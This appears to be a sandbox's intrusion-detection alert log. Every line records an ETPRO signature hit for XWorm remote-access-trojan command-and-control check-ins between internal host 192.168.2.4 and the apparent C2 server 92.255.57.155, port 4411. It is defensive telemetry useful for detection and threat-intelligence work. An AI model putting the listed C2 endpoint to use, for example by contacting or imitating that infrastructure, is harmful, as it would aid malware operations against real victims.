                                      2024-12-29T09:50:24.590080+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:24.826185+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:24.829139+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:24.920019+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:24.948706+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:25.039575+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:25.410895+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:25.454605+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:25.454744+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:25.525094+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:25.735223+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:25.765302+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:26.542763+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:26.616898+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:26.795033+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:26.815774+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:27.005261+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:27.054545+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:27.431716+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:27.432692+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:27.729998+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:27.733196+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:27.984051+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:27.993193+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:28.349203+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:28.647855+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:28.845282+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:28.915978+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:28.964601+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:29.055428+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:29.175074+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:29.175217+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:29.265968+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:29.266101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:29.336681+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:29.385226+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:29.505083+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:29.567348+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:30.267599+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:30.269550+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:30.933815+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:30.944889+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:31.144316+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:31.173180+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:31.383523+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:31.388108+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:31.503069+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:31.507470+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:31.635012+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:31.635975+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:32.351876+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:32.361841+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:34.011259+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:34.039288+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:34.370884+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:34.691200+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:34.737075+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:34.820320+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:34.910856+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:34.910964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:35.030635+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:36.402691+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:36.403723+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:36.636705+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:37.028153+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:37.054426+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:37.264888+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:37.269208+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:37.358341+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:37.388514+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:37.718652+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:37.788142+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:38.077885+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:38.081916+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:38.855270+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:38.881240+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:39.065640+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:39.125210+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:39.211108+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:39.245347+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:39.318908+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:39.365182+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:39.421416+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:39.485076+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:39.574975+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:39.604568+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:40.560743+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:40.586807+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:40.797191+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:40.799214+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:40.916824+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:40.918759+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:41.419394+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:41.421216+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:41.631321+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:41.632142+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:42.699143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:42.725987+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:42.909380+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:43.055664+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:43.124721+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:43.306431+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:43.309216+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:43.457218+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:43.624505+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:43.639295+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:44.266999+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:44.267988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:44.477066+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:44.920968+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:44.955130+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:45.944505+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:45.946339+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:46.242158+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:46.243164+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:46.859638+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:47.070658+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:47.192304+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:47.322907+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:47.401350+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:47.401428+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:47.488304+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:47.533207+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:48.162862+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:48.163875+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:48.793146+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:48.840868+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:49.003677+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:49.004491+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:49.123194+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:49.124073+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:49.337934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:49.453859+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:49.576067+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:50.636899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:50.892561+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:51.362069+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:51.509171+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:51.648618+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:51.983669+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:51.988006+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:52.619465+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:52.796384+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:53.125986+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:53.700978+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:53.731329+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:54.777634+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:54.820056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:55.030677+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:55.058821+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:55.269249+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:55.275245+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:55.522807+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:55.527332+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:55.605116+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:55.700544+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:55.902793+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:55.903636+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:56.714702+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:56.741940+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:56.925186+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:56.925894+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:57.072634+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:57.178951+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:57.235446+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:57.255964+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:57.298726+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:58.683506+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:58.684333+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:59.355347+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:59.996072+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:59.996115+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:51:00.101454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:51:00.433841+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:51:00.435977+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:51:00.730443+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:51:00.731439+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:51:01.052735+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:51:01.053669+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:51:01.222593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
